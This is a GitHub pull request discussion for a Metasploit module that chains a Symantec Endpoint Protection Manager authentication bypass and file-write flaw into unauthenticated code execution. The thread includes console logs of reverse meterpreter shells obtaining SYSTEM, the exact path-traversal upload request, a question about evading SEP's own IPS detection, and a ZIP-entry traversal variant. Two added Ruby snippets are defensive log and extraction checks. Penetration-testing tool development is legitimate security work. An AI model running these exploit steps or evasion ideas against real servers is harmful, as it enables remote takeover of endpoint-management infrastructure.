Add the Symantec Endpoint Protection Manager auth bypass rce module #5800

Merged
merged 15 commits into from Aug 14, 2015

Contributor

brandonprry commented Aug 1, 2015

This module exploits an auth bypass and arbitrary file write vuln in order to achieve unauthenticated remote code execution to drop and execute a meterpreter shell onto the box. The vulnerabilities are detailed here:
http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html

The trial available on the web is still vulnerable:

https://www4.symantec.com/Vrt/offer?a_id=77956

If for some reason this doesn't work, I have a vulnerable copy. Tested on Windows Server 2008.

msf exploit(sepm_auth_bypass_rce) > show options

Module options (exploit/windows/http/sepm_auth_bypass_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.18     yes       The target address
   RPORT      8443             yes       The target port
   SSL        true             yes       Use SSL
   TARGETURI  /                yes       The path of the web application
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.1.45     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(sepm_auth_bypass_rce) > exploit

[*] Started reverse handler on 192.168.1.45:4444 
[*] Sending stage (885806 bytes) to 192.168.1.18
[*] Meterpreter session 3 opened (192.168.1.45:4444 -> 192.168.1.18:49614) at 2015-08-01 16:42:43 -0500

meterpreter > getuid
Server username: NT SERVICE\semsrv
meterpreter > 
Contributor

brandonprry commented Aug 1, 2015

Oh, I need to randomize the filenames.

I am not sure how to make this work with the FileDropper mixin though.

Contributor

Meatballs1 commented Aug 1, 2015

It would just be register_files_for_cleanup(path1, path2), but you don't know the full path. Plus you can't delete the exe whilst it's running on Windows anyway.

No Java target? :)
Or could do a Powershell target also ;)

Contributor

brandonprry commented Aug 1, 2015

I am not sure if I can upload a JAR, can we do JSP?

Contributor

Meatballs1 commented Aug 1, 2015

There is a .to_jsp_war method that just drops a binary, which isn't much use. Although you could hijack it to drop a JAR?

There are a couple of JSP payloads for a bind TCP command shell and reverse TCP.

Contributor

brandonprry commented Aug 1, 2015

I definitely prefer having a meterp shell out of the gate, but if consensus is a preferred JSP command shell, can make this work.

Have putt putt here soon, so will have to make any updates related to that tomorrow.

Contributor

Meatballs1 commented Aug 1, 2015

Meterpreter is always the nicest, but say there is restrictive whitelisting on the host you could execute a JSP/Jar file at least.

Contributor

brandonprry commented Aug 1, 2015

Maybe the default target could upload meterp, then a second available for pure JSP.

Contributor

brandonprry commented Aug 1, 2015

I was under the impression Tomcat would need to be restarted before a JAR would work, but I might be wrong; didn't try.

Contributor

brandonprry commented Aug 2, 2015

Thanks for the feedback Markus. Both of these have been resolved. Great vulns man, thanks for sharing. :)

Contributor

brandonprry commented Aug 2, 2015

msf exploit(sepm_auth_bypass_rce) > show options

Module options (exploit/windows/http/sepm_auth_bypass_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.18     yes       The target address
   RPORT      8443             yes       The target port
   SSL        true             yes       Use SSL
   TARGETURI  /                yes       The path of the web application
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.1.45     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(sepm_auth_bypass_rce) > exploit

[*] Started reverse handler on 192.168.1.45:4444 
[*] Sending stage (885806 bytes) to 192.168.1.18
[*] Meterpreter session 9 opened (192.168.1.45:4444 -> 192.168.1.18:57812) at 2015-08-02 08:32:19 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
Contributor

mwulftange commented Aug 2, 2015

A cleanup afterwards would be nice.

Contributor

brandonprry commented Aug 2, 2015

Yeah, I mentioned earlier that I wasn't sure of the best way to use FileDropper in this. I might be able to clean up the script which executes the meterp shell, but I don't think I can clean up the actual binary dropped.

Contributor

brandonprry commented Aug 2, 2015

Have church, will need to pick this back up later this afternoon.

'Targets' =>
[
[ 'Automatic', {
'Arch' => ARCH_X86,

@mwulftange

mwulftange Aug 2, 2015

Contributor

What about 64-bit Windows?

@brandonprry

brandonprry Aug 2, 2015

Contributor

There are a couple targets it looks like I can add. One for a pure JSP payload for a command shell and a 64 bit one.

Sent from a phone

On Aug 2, 2015, at 9:15 AM, Markus Wulftange notifications@github.com wrote:

In modules/exploits/windows/http/sepm_auth_bypass_rce.rb:

      'bperry', #metasploit module
      'Markus Wulftange' #discovery
    ],
  'References'     =>
    [
      ['CVE', '2015-1486'],
      ['CVE', '2015-1487'],
      ['CVE', '2015-1489'],
      ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
    ],
  'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
  'Platform'       => 'win',
  'Targets'        =>
    [
      [ 'Automatic', {
        'Arch' => ARCH_X86,

    What about 64-bit Windows?

Contributor

brandonprry commented Aug 2, 2015

Adding a 64-bit target, not sure this will work. The SEPM process is 32-bit.

Contributor

brandonprry commented Aug 2, 2015

And FWIW I am testing against 64-bit Windows.

Contributor

brandonprry commented Aug 2, 2015

The meterp binary cannot be deleted while the shell is open, so that won't be able to be cleaned up. Working on seeing if I can clean up the JSP file that is uploaded.

Contributor

brandonprry commented Aug 2, 2015

Looks like neither of the files can be deleted. The JSP is currently being parsed when the execution of the meterp binary is performed to create the shell. The JSP can't delete itself while it is open and being executed/parsed.

Open to other ideas though.

Contributor

brandonprry commented Aug 2, 2015

One thing to note is I am not sure how a patched version behaves. Is a cookie not returned by the Forgot Password functionality?

Contributor

brandonprry commented Aug 2, 2015

@Meatballs1 I am not sure exactly what you mean by hijacking to_jsp_war for this.

Contributor

mwulftange commented Aug 3, 2015

Regarding the response of a fixed version: You'll get a JSESSIONID cookie in any case. But in the fixed version, the returned ReportingInfo within the response does not contain the session ID.

Contributor

brandonprry commented Aug 3, 2015

Thanks, I will look at making a check method this evening after work which looks for the session ID in the response to determine if the given instance is vulnerable or not.


ihacku commented Aug 4, 2015

Depending on whether the HTTP response code is 200 or not is not precise:
during my test, if the ResponseCode="0", then you successfully pwned SEPM.
But if the ResponseCode=303300693, for an unknown reason, the upload actually failed.
Maybe @mwulftange knows what this ResponseCode means?

Contributor

mwulftange commented Aug 4, 2015

@ihacku ResetPassword always returns a 200. You have to look at the ResponseCode in the returned XML.

But it only tells you whether the action was performed successfully. For example, on my test box, the response code is always -2130181964 because I have no SMTP configured and thus email delivery fails. But I still get a valid session. ;)

But the Session attribute in the inner XML in the response is a good indicator. Alternatively, you could also trigger an action type that only an admin is authorized for, for example the ReplicationStatus.

The ResponseCode 303300693 means that the Action parameter is missing.


ihacku commented Aug 4, 2015

OK, finally I know why I can't get a shell uploaded in the pentest env.
The payload

servlet/ConsoleServlet?ActionType=BinaryFile&Action=UploadPackage&PackageFile=../../../tomcat/webapps/ROOT/1.txt&KnownHosts=.

has been identified as CVE-2015-1487 by SEP. Is there any way we can bypass this?
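Since SEP's own IPS signature fires on that traversal, the same request shape is something a defender can hunt for in the manager's HTTP access logs. The Ruby below is added here and is not part of the module or this thread: it parses constructed access-log lines (hosts, timestamps and the benign request are made up) and flags ConsoleServlet UploadPackage requests whose PackageFile parameter escapes its directory, including percent-encoded and backslash-separated variants.

```ruby
require 'cgi'

# Constructed sample lines in Tomcat access-log (common log) format; not from the page's test runs.
# Line 1 is benign, lines 2-3 carry a traversal (plain and percent-encoded backslashes),
# line 4 is a well-formed UploadPackage request with a plain file name.
SAMPLE_LOG = <<~'LOG'
  10.0.0.5 - - [04/Aug/2015:10:12:01 -0500] "GET /console/ HTTP/1.1" 200 512
  10.0.0.9 - - [04/Aug/2015:10:12:07 -0500] "POST /servlet/ConsoleServlet?ActionType=BinaryFile&Action=UploadPackage&PackageFile=../../../tomcat/webapps/ROOT/1.txt&KnownHosts=. HTTP/1.1" 200 128
  10.0.0.9 - - [04/Aug/2015:10:12:09 -0500] "POST /servlet/ConsoleServlet?ActionType=BinaryFile&Action=UploadPackage&PackageFile=..%5C..%5Ctomcat%5Cwebapps%5CROOT%5Cx.jsp&KnownHosts=. HTTP/1.1" 200 128
  10.0.0.9 - - [04/Aug/2015:10:12:11 -0500] "POST /servlet/ConsoleServlet?ActionType=BinaryFile&Action=UploadPackage&PackageFile=package.zip&KnownHosts=. HTTP/1.1" 200 128
LOG

# The quoted request part of a common-log line: method, target, protocol.
REQUEST_RE = /"(?<method>[A-Z]+) (?<target>\S+) HTTP\/[\d.]+"/

# Split the request target into path and percent-decoded query parameters.
# CGI.parse tolerates malformed escapes, so an odd query never aborts the scan.
def parse_request(line)
  m = REQUEST_RE.match(line)
  return nil unless m
  path, query = m[:target].split('?', 2)
  params = CGI.parse(query.to_s).transform_values(&:first)
  { method: m[:method], path: path, params: params }
end

# True when a file-name parameter tries to leave its directory: any '..' segment
# (after treating backslashes as separators), an absolute path, or a drive letter.
def traversal?(value)
  v = value.tr('\\', '/')
  v.split('/').include?('..') || v.start_with?('/') || v.match?(/\A[A-Za-z]:/)
end

# Flag only the ConsoleServlet UploadPackage action with a traversing PackageFile.
def upload_traversal?(line)
  req = parse_request(line)
  return false unless req && req[:path].end_with?('/servlet/ConsoleServlet')
  p = req[:params]
  p['ActionType'] == 'BinaryFile' && p['Action'] == 'UploadPackage' && traversal?(p['PackageFile'].to_s)
end

# Return the log lines that should raise an alert.
def flag_lines(log)
  log.each_line.map(&:chomp).select { |line| upload_traversal?(line) }
end

if $PROGRAM_NAME == __FILE__
  flag_lines(SAMPLE_LOG).each { |line| puts "ALERT: #{line}" }
end
```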

Contributor

mwulftange commented Aug 4, 2015

@ihacku Quite interesting. Do you know the pattern they are looking for?

Contributor

brandonprry commented Aug 4, 2015

Probably the path traversal is what it is catching on.

Contributor

hdm commented Aug 4, 2015

👍

Contributor

mwulftange commented Aug 5, 2015

@ihacku Well, there is another path traversal when uploading a new client installation package via the web interface. When the uploaded ZIP is extracted, entries with a name like ..\..\hello.jsp allow traversing.
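The extraction-side fix for that second traversal is to refuse any archive entry whose name would resolve outside the extraction directory, treating backslashes as separators so that a name like ..\..\hello.jsp is caught on a Windows host. The Ruby below is an added illustration, not SEPM's or the module's code; the base directory and the entry list are constructed.

```ruby
# Resolve where a ZIP entry would land if extracted under +base+, or return nil
# when the entry name escapes it. Backslashes are normalised first because an
# entry built on Windows may carry them (..\..\hello.jsp) and Java's File will
# honour them there. Any '..' segment is rejected outright, even one that would
# stay inside (a/../b.txt), which is the conservative choice for an installer.
def extraction_target(base, entry_name)
  name = entry_name.tr('\\', '/')
  return nil if name.empty? || name.start_with?('/') || name.match?(/\A[A-Za-z]:/)
  return nil if name.split('/').include?('..')
  base_abs = File.expand_path(base)
  target = File.expand_path(name, base_abs)
  # Defence in depth: confirm the resolved path is still below the base.
  target.start_with?(base_abs + File::SEPARATOR) ? target : nil
end

# Split entry names into the ones safe to extract and the ones to reject.
def triage_entries(base, entry_names)
  entry_names.partition { |n| extraction_target(base, n) }
end

# Constructed sample entry list (not a real SEPM client package).
SAMPLE_ENTRIES = [
  'client/setup.exe',
  'client/config.ini',
  '..\\..\\hello.jsp',      # the backslash variant described above
  'a/../../x.jsp',          # forward-slash traversal
  'C:\\Windows\\x.dll',     # absolute path with drive letter
  '/etc/passwd'             # absolute POSIX path
].freeze

if $PROGRAM_NAME == __FILE__
  safe, rejected = triage_entries('/srv/sepm/packages', SAMPLE_ENTRIES)
  puts "safe:     #{safe.inspect}"
  puts "rejected: #{rejected.inspect}"
end
```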

@jvazquez-r7 jvazquez-r7 self-assigned this Aug 14, 2015

Contributor

jvazquez-r7 commented Aug 14, 2015

Did a first test against windows and ran smoothly:

msf exploit(sepm_auth_bypass_rce) > set rhost 172.16.158.135
rhost => 172.16.158.135
msf exploit(sepm_auth_bypass_rce) > run

[*] Started reverse handler on 172.16.158.1:4444
[*] Getting cookie
[*] Uploading payload...
[*] Uploading JSP page to execute the payload...
[*] Executing payload. Manual cleanup will be required.
[*] Sending stage (885806 bytes) to 172.16.158.135
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.135:1090) at 2015-08-14 16:46:34 -0500


meterpreter >
meterpreter > getuid
sServer username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.135 - Meterpreter session 1 closed.  Reason: User exit

@jvazquez-r7 jvazquez-r7 merged commit 74ed8cf into rapid7:master Aug 14, 2015

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed

jvazquez-r7 added a commit that referenced this pull request Aug 14, 2015

Contributor

jvazquez-r7 commented Aug 14, 2015

Landed after some cleanup and including FileDropper, see final result here: c02df6b

Test after changes:

msf exploit(sepm_auth_bypass_rce) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.135:8443 - Getting cookie...
[*] 172.16.158.135:8443 - Uploading payload...
[*] 172.16.158.135:8443 - Uploading JSP page to execute the payload...
[*] 172.16.158.135:8443 - Executing payload. Manual cleanup will be required.
[*] Sending stage (885806 bytes) to 172.16.158.135
[*] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.135:1206) at 2015-08-14 16:59:16 -0500
[+] Deleted ../tomcat/webapps/ROOT/yYkgAFrSlR.jsp
[!] This exploit may require manual cleanup of '../tomcat/webapps/ROOT/BtzQfuHRyM.exe' on the target

Thanks @brandonprry !

Contributor

brandonprry commented Aug 14, 2015

Nice! Thanks a bunch dude

On Aug 14, 2015, at 5:05 PM, Juan Vazquez notifications@github.com wrote:

Merged #5800.
